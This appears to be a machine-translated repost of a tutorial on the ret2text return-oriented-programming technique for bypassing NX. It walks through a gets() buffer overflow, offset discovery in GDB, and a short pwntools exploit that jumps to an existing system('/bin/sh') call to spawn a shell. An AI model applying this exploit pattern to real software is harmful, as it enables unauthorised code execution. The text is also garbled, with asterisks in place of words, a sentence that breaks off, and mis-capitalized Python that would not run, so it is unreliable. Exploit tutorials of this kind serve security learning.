Shulou(Shulou.com)06/01 Report--

Video of this article:

If the text is too boring, watch the online video: https://edu.51cto.com/sd/16514

Basics:

With NX protection turned on, the previous way of injecting code directly into the stack or heap is difficult to continue to work. * people have also proposed corresponding methods to bypass protection. At present, the main method is ROP (Return Oriented Programming), whose main idea is to use small fragments (gadgets) in the program to change the value of some registers or variables on the basis of stack buffer overflow, so as to control the execution flow of the program. The so-called gadgets is the instruction sequence ending with ret. Through these instruction sequences, we can modify the contents of some addresses and facilitate the execution flow of the control program.

The reason why it is called ROP is that the core is to use the ret instructions in the instruction set to change the execution order of the instruction stream. Generally speaking, ROP * must meet the following conditions

There is an overflow in the program and the return address can be controlled.

You can find the gadgets that meets the criteria and the address of the corresponding gadgets.

If the address of the gadgets is not fixed each time, then we need to find a way to get the corresponding address dynamically.

Today we will talk about the meaning that the program opens NX (NX that is No-eXecute). The basic principle of NX (DEP) is to mark the memory page where the data resides as unexecutable. When the program overflow is successfully transferred to shellcode, the program will try to execute instructions on the data page, and CPU will throw an exception instead of executing malicious instructions. How to overflow when

Principle

Ret2text is the code (.text) that the control program executes the program itself. In fact, this method is a general description. When we control the execution of the existing code of the program, we can also control the program to execute several pieces of code that is not adjacent to the program (that is, gadgets). This is what we call ROP.

At this point, we need to know the location of the corresponding returned code. Of course, the program may also turn on some protection, and we need to find a way to bypass it.

Step 1: disassemble the code to see the code structure

Let's put the program into IDA for analysis:

We find that the gets function (gets ()) appears in the code with the only argument being words, which cannot check whether the input line fits. The array name is converted to the address of the first element of the array, so the gets () function only knows the beginning of the array, not how many elements there are in the array. If the input string is too long, it will cause a buffer overflow (buffer overflow).

Step 2: test the overflow offset

Load the program into GDB for debugging: gdb. / xxxx

Execute command: pattern create 200is used to create strings to help us locate the overflow offset.

Execute the command: r

Enter the 200 characters we just created

At this point, an address will be exposed, according to which the offset will be obtained.

Execute the command pattern offset 0x41384141

We also know the address of system ("/ bin/sh") at this time. Change the function return address of stack space to system ("/ bin/sh") to execute here, thus get shell. The address must be 0x0804863a, because the system function doesn't know that the parameter is "/ bin/sh" until the line is executed.

PS: you can also use: objdump-d. / ret2text | grep system to view the address

Let's take a look at the code:

From pwn import *

Elf = ELF ('. / ret2text')

P = process ('. / ret2text')

Payload = 112 *'a'+ p32 (0x804863a)

P.sendline (payload)

P.interactive ()

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.